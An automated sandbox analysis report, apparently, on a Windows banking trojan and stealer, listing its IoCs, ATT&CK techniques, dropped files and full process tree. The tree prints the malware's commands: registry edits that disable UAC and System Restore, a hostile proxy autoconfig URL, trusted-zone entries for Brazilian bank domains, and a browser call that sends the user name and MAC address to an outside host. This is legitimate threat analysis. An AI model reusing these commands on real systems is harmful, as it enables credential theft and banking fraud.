343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1

Analysis

max time kernel
149s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03/10/2022, 12:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe
Size

184KB
MD5

6c8c6428a07b5025cb783c587628204f
SHA1

a8e82a79eb3de85ebc2ed80b0e9734064d5046ea
SHA256

343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1
SHA512

111c579c3fbf919c8a015f6d3a93d42c48aa2304734c8f9cff9ca85380585cbb4538475c8cadeb300726389fc26657e93d4a650ec4b7be349c22bfa2bbaf2cc6
SSDEEP

3072:uPRuJo0o/OooObMZa9QtUURb8wyGX9cvp7oNnsB2cKzsUbkWLnCe:uPRuC9OooOZQuURYjGuvS3IMT

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Executes dropped EXE 1 IoCs

pid	Process
664	Setup.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
4276	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1135146174"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6AA0D9D0-4326-11ED-B696-E62D9FD3CB0B} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1135146174"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000007355cc857553bc45187f8abb34a3c1c5b58f401027d947b8548477ac7abfafe5000000000e8000000002000020000000da0b35dd9108c1af058bb87ae8222d1558c8651acd9c5c6a0e5763f670f96e9d20000000dc5607b1809256da731f5b0a33e70534101fb99284118ad255b82eb718cc860040000000fc9cfd8697a9c73e61573ff99ef29ed8b0fd5cd41d973ca330ab0c2531c29e078342d638380b024d8cfb769e3935835b1e794bd9fbb0ba42d37e83ca8c811da1	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b142160000000002000000000010660000000100002000000007714c4db9845b26fc087db8386052bfefb55b8a505ba13692fe09c306a5a306000000000e8000000002000020000000262cfe45bc7520c2915aa16a7b4e8949e5a3fedb738063ccfcd2a12bba6c78a120000000da4c5f60219de2bb9f6254872b4e9d07d2c37f689aa47ac7387b878fa9c8367e4000000073c15ed1965d6bef9029f35bc3ccf196068c61a0dbe835356d38e6b30d71ba30f5b817f4a7bc3727d34c21ac35eb4f384ef2b6fb390e0bcbe226b29ce89e2190	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1174052129"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3000a24833d7d801	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30988083"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30988083"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d07d664833d7d801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371571764"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30988083"	IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3776	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3776	iexplore.exe
3776	iexplore.exe
1884	IEXPLORE.EXE
1884	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4512 wrote to memory of 664	4512	343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe	83
PID 4512 wrote to memory of 664	4512	343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe	83
PID 4512 wrote to memory of 664	4512	343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe	83
PID 664 wrote to memory of 4540	664	Setup.exe	84
PID 664 wrote to memory of 4540	664	Setup.exe	84
PID 664 wrote to memory of 4540	664	Setup.exe	84
PID 4540 wrote to memory of 1080	4540	cmd.exe	86
PID 4540 wrote to memory of 1080	4540	cmd.exe	86
PID 4540 wrote to memory of 1080	4540	cmd.exe	86
PID 1080 wrote to memory of 116	1080	cmd.exe	87
PID 1080 wrote to memory of 116	1080	cmd.exe	87
PID 1080 wrote to memory of 116	1080	cmd.exe	87
PID 1080 wrote to memory of 224	1080	cmd.exe	88
PID 1080 wrote to memory of 224	1080	cmd.exe	88
PID 1080 wrote to memory of 224	1080	cmd.exe	88
PID 4540 wrote to memory of 3776	4540	cmd.exe	91
PID 4540 wrote to memory of 3776	4540	cmd.exe	91
PID 4540 wrote to memory of 4040	4540	cmd.exe	93
PID 4540 wrote to memory of 4040	4540	cmd.exe	93
PID 4540 wrote to memory of 4040	4540	cmd.exe	93
PID 4540 wrote to memory of 864	4540	cmd.exe	94
PID 4540 wrote to memory of 864	4540	cmd.exe	94
PID 4540 wrote to memory of 864	4540	cmd.exe	94
PID 4540 wrote to memory of 3284	4540	cmd.exe	95
PID 4540 wrote to memory of 3284	4540	cmd.exe	95
PID 4540 wrote to memory of 3284	4540	cmd.exe	95
PID 4540 wrote to memory of 2824	4540	cmd.exe	96
PID 4540 wrote to memory of 2824	4540	cmd.exe	96
PID 4540 wrote to memory of 2824	4540	cmd.exe	96
PID 3776 wrote to memory of 1884	3776	iexplore.exe	97
PID 3776 wrote to memory of 1884	3776	iexplore.exe	97
PID 3776 wrote to memory of 1884	3776	iexplore.exe	97
PID 4540 wrote to memory of 2832	4540	cmd.exe	98
PID 4540 wrote to memory of 2832	4540	cmd.exe	98
PID 4540 wrote to memory of 2832	4540	cmd.exe	98
PID 2832 wrote to memory of 4088	2832	cmd.exe	99
PID 2832 wrote to memory of 4088	2832	cmd.exe	99
PID 2832 wrote to memory of 4088	2832	cmd.exe	99
PID 2832 wrote to memory of 4084	2832	cmd.exe	100
PID 2832 wrote to memory of 4084	2832	cmd.exe	100
PID 2832 wrote to memory of 4084	2832	cmd.exe	100
PID 4540 wrote to memory of 4924	4540	cmd.exe	101
PID 4540 wrote to memory of 4924	4540	cmd.exe	101
PID 4540 wrote to memory of 4924	4540	cmd.exe	101
PID 4540 wrote to memory of 1624	4540	cmd.exe	102
PID 4540 wrote to memory of 1624	4540	cmd.exe	102
PID 4540 wrote to memory of 1624	4540	cmd.exe	102
PID 4540 wrote to memory of 1040	4540	cmd.exe	103
PID 4540 wrote to memory of 1040	4540	cmd.exe	103
PID 4540 wrote to memory of 1040	4540	cmd.exe	103
PID 4540 wrote to memory of 1888	4540	cmd.exe	104
PID 4540 wrote to memory of 1888	4540	cmd.exe	104
PID 4540 wrote to memory of 1888	4540	cmd.exe	104
PID 4540 wrote to memory of 2848	4540	cmd.exe	105
PID 4540 wrote to memory of 2848	4540	cmd.exe	105
PID 4540 wrote to memory of 2848	4540	cmd.exe	105
PID 4540 wrote to memory of 4196	4540	cmd.exe	106
PID 4540 wrote to memory of 4196	4540	cmd.exe	106
PID 4540 wrote to memory of 4196	4540	cmd.exe	106
PID 4540 wrote to memory of 4312	4540	cmd.exe	107
PID 4540 wrote to memory of 4312	4540	cmd.exe	107
PID 4540 wrote to memory of 4312	4540	cmd.exe	107
PID 4540 wrote to memory of 2204	4540	cmd.exe	108
PID 4540 wrote to memory of 2204	4540	cmd.exe	108

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3696	attrib.exe
4992	attrib.exe

C:\Users\Admin\AppData\Local\Temp\343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe
"C:\Users\Admin\AppData\Local\Temp\343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Users\Admin\AppData\Local\Temp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:664
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\664MEKM5.bat" "C:\Users\Admin\AppData\Local\Temp\Setup.exe" "
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c getmac | C:\Windows\system32\find.exe "Device"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1080
    - - C:\Windows\SysWOW64\getmac.exe
        
        getmac
        5⤵
        
        PID:116
    - - C:\Windows\SysWOW64\find.exe
        
        C:\Windows\system32\find.exe "Device"
        5⤵
        
        PID:224
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" "http://ads.fastentrega.com/ok.php?a=Admin&b=TMKNGOMU&c=E6-2D-9F-D3-CB-0B"
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3776
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3776 CREDAT:17410 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1884
  - - C:\Windows\SysWOW64\fsutil.exe
      fsutil file createnew "C:\Users\Admin\AppData\Local\Temp\thum.db" 666"
      4⤵
      PID:4040
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~x
      4⤵
      PID:864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~x "
      4⤵
      PID:3284
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "Internet Explorer\Main"
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~y | C:\Windows\system32\find.exe "S-1-5-21"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2832
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~y "
        5⤵
        
        PID:4088
    - - C:\Windows\SysWOW64\find.exe
        
        C:\Windows\system32\find.exe "S-1-5-21"
        5⤵
        
        PID:4084
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
      4⤵
      PID:1624
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
      4⤵
      PID:1040
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.bb" /v "http" /t REG_DWORD /d "0x00000002" /f
      4⤵
      PID:1888
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.itau" /v "http" /t REG_DWORD /d "0x00000002" /f
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.hsbc" /v "http" /t REG_DWORD /d "0x00000002" /f
      4⤵
      PID:4196
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.bradesco" /v "http" /t REG_DWORD /d "0x00000002" /f
      4⤵
      PID:4312
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.santander" /v "http" /t REG_DWORD /d "0x00000002" /f
      4⤵
      PID:2204
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:4276
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "http://feliz.sejabemvindo2013.com.br/" /f
      4⤵
      PID:3840
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
      4⤵
      PID:4600
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
      4⤵
      PID:2492
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
      4⤵
      PID:3456
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
      4⤵
      PID:1404
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
      4⤵
      PID:3116
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
      4⤵
      PID:4492
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "http://feliz.sejabemvindo2013.com.br/" /f
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
      4⤵
      PID:2468
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
      4⤵
      PID:856
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
      4⤵
      PID:4748
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "Autoconfig" /t reg_dword /d 00000001 /f
      4⤵
      PID:4228
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AdvancedTab" /t reg_dword /d 00000001 /f
      4⤵
      PID:4360
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:3524
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
      4⤵
      PID:4476
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js"
      4⤵
      Views/modifies file attributes
      PID:3696
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\system32\attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js"
      4⤵
      Views/modifies file attributes
      PID:4992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
046bedf3b97e782edc5343dc24a1c485

SHA1
ebad04906d01fdb00719463e729f201a043433ae

SHA256
4bb13178dccf62921053ef1b62f9bdb994dfd0520741873a60ac2c1484df78ca

SHA512
18203014488892166d7c331f8239c1c030fd9831b8040d51b3fdf3d887f867380ff639ccac26e8751b7b13d1dc83e2931f96019783695e7a93c4348046c9fabf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
017b7bfd6ff50fd8ca1684af52df108f

SHA1
0c7d31770376c68affb5542444943deb8276a721

SHA256
452c455b4e35575d7c4dc506070914cd5c9676e6bf2cfa5fce32830dfdf77eb6

SHA512
b0a8f1abdb003db1413705648e5fc6c3cca546a6a9cc36c170f5d3fb0b64633fa89d0ce720d374e4e2fb675d041cfbe39f9bb66e21d54d7ef5f48b069f0fc7a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\664MEKM5.bat

Filesize
5KB

MD5
0abf1d3702f4ea8adb195f4b87120d40

SHA1
0e42d7fcd9bb3ab72a95aa136f51a19c867bc024

SHA256
015e1527af15a705081ec987071a957a0453978b57cf53d9c8f396b969be126a

SHA512
31d1a871744c221cb6e081cf6ce958058b53835d1d957d3dc37299cccbf9f0c95160760f6bcc7ebce1b76d2a6bb61d5a167cb8943c7bd1b93e08cc6d68eedf65

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe

Filesize
149KB

MD5
6a073b16b524deca92228174d711a6c0

SHA1
b248face191a754602d506d3d1d4136ea51c6e6f

SHA256
ff563660601ea093b0f143811f19fa7321f035df329d834d9f2f8b7062bfaf8e

SHA512
74e51758399ffd8dbf3360ebe747cc99e6a2577fb30580b1861305965c09a04a150ce0cb6b8fb64c3ac8ef7071fdc64eea5b4e203daaed83cc04235eaed226d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe

Filesize
149KB

MD5
6a073b16b524deca92228174d711a6c0

SHA1
b248face191a754602d506d3d1d4136ea51c6e6f

SHA256
ff563660601ea093b0f143811f19fa7321f035df329d834d9f2f8b7062bfaf8e

SHA512
74e51758399ffd8dbf3360ebe747cc99e6a2577fb30580b1861305965c09a04a150ce0cb6b8fb64c3ac8ef7071fdc64eea5b4e203daaed83cc04235eaed226d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\~x

Filesize
12.6MB

MD5
56c0aecd3f0d6fa6f63869a0fdb94ff0

SHA1
1d6e32157ecc5bd970815b5decce075f983832da

SHA256
1b9f05d8e8112439addc1cd38a7f48e3a739eae65959e1f2e2243c1fe047fc03

SHA512
0785f3a91716ad2b3e8bae8ebf245d6c201a44552ea34f9d5e1b63e7ae48f92a141b56094ba4a0900db54c5d860b34f70649e8b53f2d5f07b66f8ff1efa87b4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\~y

Filesize
742B

MD5
b7740d2b8a6f07b92ff3b3aad8bfc043

SHA1
3de95410776924e7afc25b23cadde40c46eabecf

SHA256
dcc2249e28c2565fd17bf72a156aaf3ceb4cf701dbc57193d9fc7e8490a38e31

SHA512
fc6612ad4eaf8fcc8aa808012080c28ff26a281f12f9c861866eda5f3479db0ebfe2058882522c0ef439caa071904dfd20417580d20d2d9189ac5b8ee9a05a1b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js

Filesize
122B

MD5
8bc3bd5c7f165afac22f5a4e8509d954

SHA1
f72c0d8ef285ce1efc0a815725f1e78b15dd080b

SHA256
fbe6a62ac8ac10b712f78ca4398d146f1706da757a7e7fcc3b979c18e3e86a8a

SHA512
64cece72828c121bba0e78418628a72a1f56e76c50d4fe5569b157039a3aca540937ab929cdc3a63964df0e91578a087740ca4768aa8074f13c95073bd40e771

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads